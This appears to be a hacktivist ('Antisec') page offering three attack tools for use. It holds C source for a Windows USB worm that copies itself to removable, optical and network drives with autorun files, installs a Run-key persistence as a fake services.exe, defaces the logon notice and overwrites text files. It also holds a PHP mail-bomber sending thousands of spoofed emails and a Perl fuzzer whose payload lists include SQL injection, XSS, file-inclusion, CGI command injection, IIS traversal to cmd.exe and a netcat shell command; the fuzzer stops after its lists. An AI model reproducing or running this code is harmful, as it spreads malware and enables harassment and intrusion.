USB Worm

Anons,

We must continue to step up our efforts. Below I have written a USB worm virus. Enjoy! Antisec is strong, stay strong.

#include <windows.h>
#include <stdio.h>
// Marker string that WinMain writes into files it handles as .txt (see the
// file loop in WinMain).
#define IMSG “|__[__]__/=+-\\ SaveItForLater :] USB Worm /-+=\\__[__]__|”
// Full path of the running executable, filled by GetModuleFileName in WinMain;
// it is the source argument of every CopyFile in this file.
char me[1024];
// Registry handle used by Startup(); winLogin() declares its own local hKey.
HKEY hKey;
// Drive roots probed by spreadUSB() (indices 0..23).
char *drives[] = {“C:”,”D:”,”E”,”F:”,”G:”,”H:”,”I:”,”J:”,”K:”,”L:”,
                  “M:”,”N:”,”O:”,”P:”,”Q:”,”R:”,”S:”,”T:”,”U:”,”V:”,
                  “W:”,”X:”,”Y:”,”Z:”};
/*
 * Propagation thread (started from WinMain). Every 120 s it walks `drives`
 * and, depending on the type reported by GetDriveType, copies the running
 * executable (`me`) to the drive under a benign-looking name:
 *   DRIVE_REMOVABLE : \Driver_Update.exe  plus an autorun.inf invoking it
 *   DRIVE_CDROM     : \Worm_Pwn.exe       plus an autorun.inf invoking it
 *   DRIVE_REMOTE    : \Upd_Config.exe     (no autorun.inf)
 * The autorun.inf is first written to the process's current directory,
 * copied to the drive, then deleted locally.
 *
 * Defender notes: the dropped file names, the "[autorun]\r\nopen=" stanza,
 * the write of <drive>\autorun.inf and the 2-minute cadence are the
 * observable indicators. NOTE(review): current Windows releases generally do
 * not honor autorun.inf on removable media, so the removable and network
 * paths depend on a user launching the dropped file; alerting on executables
 * written to removable/network drive roots covers this behaviour.
 */
DWORD WINAPI spreadUSB()
{
    while(1)
    {
        Sleep(120000); // 2-minute pause between sweeps
        int i;
        for(i = 0;i < 24;i++)
        {
            if((GetDriveType(drives[i])) == DRIVE_REMOVABLE)
            {
                char hldPath[50];
                char usbFile[30] = “\\Driver_Update.exe”;
                char autoRun[50] = “[autorun]\r\nopen=Driver_Update.exe”;
                strcpy(hldPath,drives[i]);
                strcat(hldPath,”\\autorun.inf”);
                // autorun.inf is staged in the current directory, then copied to the drive.
                FILE *fp = fopen(“autorun.inf”,”w”);
                fprintf(fp,autoRun);
                fclose(fp);
                CopyFile(“autorun.inf”,hldPath,0); // bFailIfExists = 0: replaces an existing autorun.inf
                remove(“autorun.inf”);
                strcat(drives[i],usbFile);
                CopyFile(me,drives[i],0); // drop a copy of this executable on the drive
            }
            else if((GetDriveType(drives[i])) == DRIVE_CDROM)
            {
                char cdPath[50];
                char cdFile[20] = “\\Worm_Pwn.exe”;
                char cdAutr[50] = “[autorun]\r\nopen=Worm_Pwn.exe”;
                strcpy(cdPath,drives[i]);
                strcat(cdPath,”\\autorun.inf”);
                FILE *fpp = fopen(“autorun.inf”,”w”);
                fprintf(fpp,cdAutr);
                fclose(fpp);
                CopyFile(“autorun.inf”,cdPath,1); // bFailIfExists = 1: leaves an existing autorun.inf alone
                remove(“autorun.inf”);
                strcat(drives[i],cdFile);
                CopyFile(me,drives[i],0);
            }
            else if((GetDriveType(drives[i])) == DRIVE_REMOTE)
            {
                // Network shares only get the executable copy, no autorun.inf.
                char remName[20] = “\\Upd_Config.exe”;
                strcat(drives[i],remName);
                CopyFile(me,drives[i],0);
            }
        }
    }
}
/*
 * Persistence. Copies the running executable to %WINDIR%\services.exe
 * (bFailIfExists = 1, so the copy fails when that file already exists) and,
 * on success, registers that path as value "services" under
 * HKLM\Software\Microsoft\Windows\CurrentVersion\Run.
 *
 * Returns 1 when the copy succeeded (the Run-key write is not checked),
 * 0 when the copy failed; WinMain branches on that result.
 *
 * Defender notes: the legitimate Service Control Manager binary is
 * %WINDIR%\System32\services.exe; a services.exe directly in %WINDIR%, or a
 * Run value named "services", is the indicator. Both the file copy and the
 * HKLM write require administrative rights, so non-admin accounts stop this
 * path.
 */
BOOL Startup()
{
    char dropTo[1024];
    GetWindowsDirectory(dropTo,1024);
    strcat(dropTo,”\\services.exe”);
    if((CopyFile(me,dropTo,1)) == 0) // fails if the target already exists or cannot be written
        return 0;
    else
    {
        // Auto-start entry pointing at the dropped copy.
        if(RegOpenKeyEx(HKEY_LOCAL_MACHINE, “Software\\Microsoft\\Windows\\CurrentVersion\\Run”,0,KEY_SET_VALUE,&hKey) == ERROR_SUCCESS)
        {
            RegSetValueEx(hKey,”services”,0,REG_SZ,(const unsigned char*)dropTo,strlen(dropTo));
            RegCloseKey(hKey);
        }
        return 1;
    }
}
/*
 * Nuisance thread (started from WinMain): repeatedly sets the title of
 * whatever window is currently in the foreground to the banner below.
 * Runs until the process exits. Defender note: the banner text is a plain
 * string indicator both in the on-disk binary and in window titles.
 */
DWORD WINAPI changeTitle(LPVOID lParam)
{
    while(1)
    {
        HWND hWnd = GetForegroundWindow();
        SetWindowText(hWnd,”|__[__]__/=+-\\ SaveItForLater :] Worm – illuz1oN /-+=\\__[__]__|”);
    }
}
/*
 * Logon-screen defacement: writes the Winlogon LegalNoticeCaption and
 * LegalNoticeText values under
 * HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon, which Windows
 * shows as a notice before interactive logon. The key is opened and closed
 * once per value; no return value is checked.
 * Defender note: an unexpected change to these two values (here carrying the
 * contact address below) is a direct indicator; the writes need rights on
 * HKLM.
 */
void winLogin(void)
{
    HKEY hKey; // local handle, shadows the file-scope hKey
    char szCaption[] = ”          |__[__]__/=+-\\ illuz1oN /-+=\\__[__]__|”;
    char szText[] = ”             |__[__]__/=+-\\ SaveItForLater :] Worm By illuz1oN /-+=\\__[__]__|”
                    “\nIf you want to remove this worm, contact illuz1oN – illuz1oN@hotmail.co.uk”
                    “\n… AV Companies ~censored~ You …”;
    RegOpenKeyEx(HKEY_LOCAL_MACHINE,”Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon”,0,KEY_SET_VALUE,&hKey);
    RegSetValueEx(hKey,”LegalNoticeCaption”,0,REG_SZ,(const unsigned char*)szCaption,sizeof(szCaption));
    RegCloseKey(hKey);
    RegOpenKeyEx(HKEY_LOCAL_MACHINE,”Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon”,0,KEY_SET_VALUE,&hKey);
    RegSetValueEx(hKey,”LegalNoticeText”,0,REG_SZ,(const unsigned char*)szText,sizeof(szText));
    RegCloseKey(hKey);
}
/*
 * Entry point.
 *  1. Records its own path in `me` (source for every later CopyFile).
 *  2. Single-instance guard: creates the named mutex "-+- illuz1oN -+-" and
 *     exits if it already existed.
 *  3. If Startup() returns 0 (no copy to %WINDIR%\services.exe), it
 *     enumerates the current directory with "*.*": entries it handles as
 *     .txt get IMSG written at their start (OPEN_EXISTING), entries it
 *     handles as .exe get FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN.
 *  4. Otherwise it sets the logon notice (winLogin), starts the changeTitle
 *     and spreadUSB threads, and sleeps forever.
 * Defender notes: the mutex name is a usable process-level indicator; the
 * registry and file-system effects are described on Startup(), winLogin()
 * and spreadUSB().
 */
int WINAPI WinMain (HINSTANCE hinst,HINSTANCE prhin,LPSTR argsx,int in)
{
    GetModuleFileName(0,me,1024);
    CreateMutex(0,0,”-+- illuz1oN -+-“);
    if(GetLastError() == ERROR_ALREADY_EXISTS) // another instance already holds the mutex
    {
        ExitProcess(0);
    }
    else
    {
        if((Startup()) == 0)
        {
         // Fallback when the %WINDIR% copy did not happen: touch files in the
         // current directory instead.
         char szMask[4] = “*.*”;
         DWORD ret = 0;
         WIN32_FIND_DATA fData;
         HANDLE hFind,hFile;
         hFind = FindFirstFile(szMask,&fData);
         if(fData.cFileName == “*.txt”)
         {
            hFile = CreateFile(fData.cFileName,GENERIC_WRITE,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
            if(hFile == INVALID_HANDLE_VALUE)
               ExitProcess(0);
            else
            {
               WriteFile(hFile,IMSG,sizeof(IMSG),&ret,0); // overwrite the start of the file with the marker
               CloseHandle(hFile);
            }
         }
         else if(fData.cFileName == “*.exe”)
         {
            SetFileAttributes(fData.cFileName,FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN); // hide executables from default Explorer views
            CloseHandle(hFile);
         }           
         while (FindNextFile(hFind,&fData))
         {
            if(fData.cFileName == “*.txt”)
            {
               hFile = CreateFile(fData.cFileName,GENERIC_WRITE,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
               if(hFile == INVALID_HANDLE_VALUE)
                  ExitProcess(0);
               else
               {
                  WriteFile(hFile,IMSG,sizeof(IMSG),&ret,0);
                  CloseHandle(hFile);
               }
            }         
            else if(fData.cFileName == “*.exe”)
            {
               SetFileAttributes(fData.cFileName,FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);
               CloseHandle(hFile);
            }               
         }           
         FindClose(hFind);
        }
        else
        {
            // Installed: deface the logon screen, start the two worker threads, park forever.
            winLogin();
            unsigned long title;
            CreateThread(0,0,changeTitle,0,0,&title);
            unsigned long virii;
            CreateThread(0,0,spreadUSB,0,0,&virii);
            Sleep(INFINITE);
        }
    }
}

The Infamous Email Bomber

Greetings Fellow Anons!

For decades, hackers and crackers internationally have been using the email bomber program to create havoc. That is just what the antisec movement needs. I have written a php version of it, enjoy! Stay strong. 

<?php
 

// Mail-bombing form handler. After validating the POST fields it calls
// mail() $number times (2..9999) to one recipient, with a caller-supplied
// From / Reply-To header. Defender notes: on a shared host this appears as a
// burst of mail() calls from a single script and request; per-script/per-user
// outbound rate limits, SPF/DMARC checks on the asserted From domain, and
// recipient-side rate limiting are the relevant controls.
// The header below is assembled from f_name and f_email; only f_email is
// format-checked, so the author's note about adding filtering applies to
// f_name as well.

// Remember, you must add in any filtration
// functions yourself, such as the famous
// mysql_real_escape_string(); or even
// htmlentities(); or a custom function...
 
$f_name = isset($_POST['f_name']) ? $_POST['f_name'] : "";
$f_email = isset($_POST['f_email']) ? $_POST['f_email'] : "";
 
$r_email = isset($_POST['r_email']) ? $_POST['r_email'] : "";
 
$subject = isset($_POST['subject']) ? $_POST['subject'] : "";
$message = isset($_POST['message']) ? $_POST['message'] : "";
 
// Strip anything from the first '.' onward, i.e. drop a decimal part.
$number = isset($_POST['number']) ? preg_replace('/\..*/', '', $_POST['number']) : "";
 
// Mail headers are built straight from request fields.
$header = "From: ".$f_name." <".$f_email.">\n";
$header .= "Reply-To: ".$f_email."\n";
 
echo "<center>\n";
 
// Any non-empty field means the form was submitted; otherwise render it.
if ($f_name != "" || $f_email != "" || $r_email != "" || $subject != "" || $message != "" || $number != "") {
        $errors = "";
 
        if (strlen($f_name) > 40) {
                $errors .= "Your name must be 40 characters or less.<br />\n";
        }
 
        if ($f_email == "") {
                $errors .= "You must enter a sender email address.<br />\n";
        } else {
                if (!preg_match("/^[-0-9A-Z_.]{1,50}@([-0-9A-Z_.]+.){1,50}([0-9A-Z]){2,4}$/i", $f_email)) {
                        $errors .= "You must enter a valid sender email address.<br />\n";
                }
        }
 
        if (strlen($f_email) > 60) {
                $errors .= "Your email must be 60 characters or less.<br />\n";
        }
 
        if ($r_email == "") {
                $errors .= "You must enter a recipient email address.<br />\n";
        } else {
                if (!preg_match("/^[-0-9A-Z_.]{1,50}@([-0-9A-Z_.]+.){1,50}([0-9A-Z]){2,4}$/i", $r_email)) {
                        $errors .= "You must enter a valid recipient email address.<br />\n";
                }
        }
 
        if (strlen($r_email) > 60) {
                $errors .= "The recipient email must be 60 characters or less.<br />\n";
        }
 
        if (strlen($subject) > 40) {
                $errors .= "The subject must be 40 characters or less.<br />\n";
        }
 
        if ($message == "") {
                $errors .= "You must enter a message to send.<br />\n";
        }
 
        // Message count is bounded to 2..9999 by these checks.
        if ($number == "") {
                $errors .= "You must enter a number of messages to send.<br />\n";
        } else {
                if ($number < 2) {
                        $errors .= "You must enter a number greater than 1.<br />\n";
                } elseif ($number > 9999) {
                        $errors .= "You must enter a number less than 10000.<br />\n";
                }
        }
 
        if ($errors == "") {
                // Empty subject: each message gets a 5-hex-char pseudo-random subject.
                if ($subject == "") {
                        for($i=1; $i <= $number; $i++){
                                mail($r_email, substr(md5(rand(1, 100)), 0, 5), $message, $header);
                        }
                } else {
                        for($i=1; $i <= $number; $i++){
                                mail($r_email, $subject, $message, $header);
                        }
                }
 
                echo $number." messages have been sent to ".$r_email." successfully.<br />\n<a href='nojavascript...history.go(-1);' title='Start Another Mail Bomb'>Start Another Mail Bomb</a><br />\n";
        } else {
                echo "<span style='color: red;'>n".$errors."</span>\n<a href='nojavascript...history.go(-1);' title='Try Again'>Please Try Again</a><br />\n";
        }
} else {
        // No input yet: print the submission form.
        echo "* Denotes a required field.<br /><br />nNote that leaving a subject blank<br />nwill generate a random subject<br />nfor every new message.<br /><br />\n";
        echo "<table cellspacing='2' cellpadding='2'>\n";
        echo "<form action='' method='post'>\n";
        echo "<tr>\n";
        echo "<td>Your Name:</td>\n";
        echo "<td><input type='text' name='f_name' size='50' maxlength='40' /></td>\n";
        echo "</tr>\n<tr>\n";
        echo "<td>Your Email: *</td>\n";
        echo "<td><input type='text' name='f_email' size='50' maxlength='60' /></td>\n";
        echo "</tr>\n<tr>\n";
        echo "<td>Recipient Email: *</td>\n";
        echo "<td><input type='text' name='r_email' size='50' maxlength='60' /></td>\n";
        echo "</tr>\n<tr>\n";
        echo "<td>Subject:</td>\n";
        echo "<td><input type='text' name='subject' size='50' maxlength='40' /></td>\n";
        echo "</tr>\n<tr>\n";
        echo "<td>Message: *</td>\n";
        echo "<td><textarea name='message' rows='5' cols='50'></textarea></td>\n";
        echo "</tr>\n<tr>\n";
        echo "<td>Number Of Messages: *</td>\n";
        echo "<td><input type='text' name='number' size='4' maxlength='4' /></td>\n";
        echo "</tr>\n<tr>\n";
        echo "<td></td>\n";
        echo "<td><input type='submit' value='Start Mail Bomb' /></td>\n";
        echo "</tr>\n";
        echo "</form>\n";
        echo "</table>\n";
}
 
echo "</center>\n";
 
?>

Perl Server Fuzzer

Greetings Anons,

As our revolution grows more and more urgent, our channels of attack and our tools at our disposal must be used to their fullest potential. Below I have written a perl script for server fuzzing, remember the revolution! Do not forgive, nor forget! Stay strong my friends.

 

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
use 5.0.10;
use strict;
use warnings;

# Base URL taken from the first command-line argument; every string from the
# lists below is appended to it verbatim to form the request URL.
my $host = $ARGV[0];

 
my @Fuzzer=(
      “cat ../../etc/passwd%00″,”alert(document.cookie);”,”/cgi-bin/*”,”/cgi-bin/”,
      “&0=+1+union+select”,”order+by+5–“,”order+by+100–“,”SELECT * FROM users–“,”../../etc/group”,
      “SELECT * FROM wp_users–“,”cat%20../../etc/group%00”,
      “PUT /pentest/windows-binaries/tools/nc.exe && nc -lvp 8080 -e cmd.exe”,
      “cd /var/www/htdocs && grep phpinfo www”,”‘ or ‘a’=’a”,”or 1=1″,”../../../boot.ini”,
      “‘ or ‘x’=’x–“,”admin’–“,”echo <?php phpinfo()?>”
                       ); 

my @XSS = ( “”>alert(‘XSS’) “, 
            “”>alert(123)<“,
            “”><IMG SRC=”javascript:alert(123);”> “,   
            “”>alert(123)”, 
            “”>”, 
            ” “><IMG SRC=”javascript:alert(‘XSS’)”> “,
            “”><IMG SRC=nojavascript…alert(‘XSS’)> “,
            “”><IMG SRC=nojavascript…alert(‘XSS’)> “,
            “”><IMG “””>alert(“XSS”)”> “,
            ” “><IMG “””>alert(123)> “,
            “”><IMG SRC=nojavascript…alert(String.fromCharCode(88,83,83))> “,
            ” <IMG SRC=”jav%20%20%20%20ascript:alert(‘XSS’)”;”> “,
            “”>alert(document.cookie) “,
            ” “><alert(123);//<“,
            “”><IMG SRC=java%00script:alert(String.fromCharCode(88,83,83))> “,
           ); #<-Add XSS payload strings here. Its a bitch
                                                                                                                                                                                             #to debug if you dont escape quotes
my @SQLtests = ( ” ‘ “,” ” “,” ‘ or 1=1– ” , ” ‘ or ‘a’=’a”,” ‘ or ‘x’=x”, ” ” or “z”=”z”,
                 “1 OR 1=1–“,”1,1″, ” ‘ or 5-5–“,”‘ having 1=1–” );

my @MSSQL= (“‘ having 1=1–“,”1 EXEC SP_ (or EXEC XP_)”,”1 AND USER_NAME() = ‘dbo'”, ” ;exec..cmd=’dir'”,
        “AND 1=(SELECT COUNT(*) FROM tablenames); –“,”+1 UNION ALL SELECT 1,2,name,4,5,6,7 FROM sysObjects WHERE xtype = ‘U’–“,
       “1+UNION/**/ SELECT/**/ALL FROM WHERE “,”1 UNION ALL SELECT 1,2,3,4,5–“,”select * from users having 1=1+GROUP BY uid;–“,
       “-1+union+select+null–“,
       “-1+union+select+null,null;–“,
       “-1+union+select+null,null,null–“,
       “-1+union+select+null,null,null,null–“,
       “-1+union+select+null,null,null,null,null–“,
       “-1+union+select+null,null,null,null,null,null;–“,
       “-1+union+select+null,null,null,null,null,null,null;–“,
       “-1+union+select+null,null,null,null,null,null,null,null;–“,
       “-1+union+select+null,null,null,null,null,null,null,null,null’–“,
       “-1+union+select+null,null,null,null,null,null,null,null,null,null’–“,
       “-1+union+select+null,null,null,null,null,null,null,null,null,null,null;–“, 
       “-1+union+select+null,null,null,null,null,null,null,null,null,null,null,null;–“,
       “-1+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null;–“,
       “-1+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null–“
                                               ); #<- MSSqli strtings

my @MYSQL= (“1+order+by+2–“,”1+order by 3–“,”order by 50–“,”1+order+by+5–“,”1+order+by+6–“,”1+order+by+7–“,”1+order+by+8–“,
       “1+order+by+9–“,”1+order+by+10–“,”1+order+by+11–“,”1+order+by+12–“,”1+order+by+13”,”1+order+by+14–“,
       “and+1/**/union/**/select”,
       “-1/**/union/**/select/**/null–“,
       “-1/**/union/**/select/**/null,null–“,
       “-1/**/union/**/select/**/null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null,null,null,null,null–“,
       “-1/**/union/**/select/**/null,null,null,null,null,null,null,null,null,null,null,null,null,null,null–“);

my @LFIlogs = (“../../var/log/httpd/error.log”,”../../var/log/httpd/error_log”,”../../var/log/apache/error.log”,
               “../../var/log/apache/error_log”,”../../var/log/apache2/error.log”,” ../../etc/passwd%00″,
              “../../var/log/apache2/error_log”,”../../logs/error.log”,”../../usr/local/apache/logs/error_log”,
               “../../var/log/apache/error_log”,”../../var/log/apache/error.log”,”../../var/www/logs/error_log”,
               “../../etc/httpd/logs/error_log”,”../../etc/httpd/logs/error.log”,”../../etc/passwd”,
               “../../var/www/logs/error.log”,”../../usr/local/apache/logs/error.log”,”../../etc/group”,
               “../../var/log/error_log”,”../../apache/logs/error.log”,”../../etc/passwd”,”../../etc/group%00″
                                           );#<-LFI and/or traversal to possible LFI strings

my @CGIs = (“/cgi-bin/handler/bah;cat%20%20%20/etc/passwd|?  data=Download”, 
       “../cgi-bin/handler/bah;cat%20%20/etc/passwd |    ?  data=Download”, 
       “/cgi-bin/test-cgi?/* Replace /*”,
       “/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd”,
       “../blah.php?source=/msadc/Samples/../../../../../boot.ini”,
       “../cgi-bin/faxsurvey?/bin/cat%20%20%20%20/etc/passwd”,
       “/cgi-bin/campas?%0acat%0a/etc/passwd%0a”,
       “/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd”,
       “/archive-j457nxiqi3gq59dv/199805/count.cgi.l”,
       “/cgi-bin/pfdispaly.cgi? /../../../../etc/passwd”,
       “/cgi-bin/pfdispaly.cgi?’%0A/bin/uname%20-a|'”,
       “/scripts/convert.bas?../../win.ini”,
       “/cgi-bin/htmlscript? ../../../../etc/passwd”,
       “/cgi-bin/infosrch.cgi cmd=getdoc&db=man&fname=|/bin/id”,
       “/cgi-bin/loadpage.cgi?user_id=1&file=../../etc/passwd”,
       “echo -e “GET http://$host/cgi-bin/loadpage.cgi? user_id=1&file=|”/bin/ls”| HTTP/1.0″ | nc  -lvp 8080”
               ); #Arbitrary cgi strings

my @Unicode = (“/scripts/..%c0%af../winnt/system32/cmd.exe?/c+”,”/scripts..%c1%9c../winnt/system32/cmd.exe?/c+”,
               “/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+”,”/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+”,
               “/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+”,”/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+”,
               “/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+”,”/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+”,
               “/scripts/..%c1%af../winnt/system32/cmd.exe?/c+”,”/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+”,
               “/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+”,”/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+”,
               “/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+”,”/MSADC/root.exe?/c+dir”,
               “/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+”,
               “/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+”,
               “/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+”,
               “/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+”,
               “/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+”,
               “/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+”,
               “/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir”,
               “/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir”,
               “/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%c1%af../winnt/system32/cmd.exe?/c+dir”,”/msadc/..%e0%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%c1%pc../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,
               “/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir”,”/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir”,”/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir”,”/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%252f../winnt/system32/cmd.exe?/c+dir”,”/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,”/scripts/..%255c../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir”,”/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir”,”/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir”,”/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir”,”/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir”,”/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir”,
“/scripts/root.exe?/c+dir/msadc/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir”,
               “/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir”,
               “/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir”,             “/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,
               “/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir”,
               “/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir”,
               “/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir”,
               “/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,
               “/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir”,
               “/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir”,
               “/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir”,
               “/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir”,
               “/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir”,
               “/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir”,
               “/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,
               “/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,
               “/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/c/winnt/system32/cmd.exe?/c+dir”,
               “/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,
               “/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/d/winnt/system32/cmd.exe?/c+dir”,
               “/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir”,
               “/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir”,
               “/msaDC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir”,
               “/msaDC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir”,
               “/msaDC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir”,
               “/msaDC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir”,
               “/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir”
                            );

# Menu lines printed before the prompt; the leading digit is the choice
# matched against the user's input below.
